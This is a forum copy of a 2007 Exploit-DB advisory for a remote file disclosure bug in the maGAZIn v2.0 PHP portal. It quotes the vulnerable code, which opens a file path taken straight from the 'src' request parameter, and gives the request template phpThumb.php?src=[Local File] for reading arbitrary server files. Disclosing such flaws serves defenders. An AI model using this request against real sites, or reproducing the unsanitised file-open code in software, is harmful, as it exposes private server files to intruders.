- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3901
- Проверка EDB
-
- Пройдено
- Автор
- DJ7XPL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2643
- Дата публикации
- 2007-05-11
Код:
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
---------------------------------------------------------------------
[!] Portal : maGAZIn v2.0
[!] Download : http://www.pinkcrow.net/Scripts/gallery.php
[!] Type : Remote File Disclosure Vulnerability
---------------------------------------------------------------------
---------------------------------------------------------------------
Vuln Code : Line (152 - 157)
[Code]
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {
$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));
fclose($fp);
} else {
ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);
}---------------------------------------------------------------------
---------------------------------------------------------------------
Bug :
http://[Target]/[Path]/phpThumb.php?src=[Local File]
Example :
Для просмотра ссылки Войди
---------------------------------------------------------------------
# milw0rm.com [2007-05-11][/CODE]
- Источник
- www.exploit-db.com
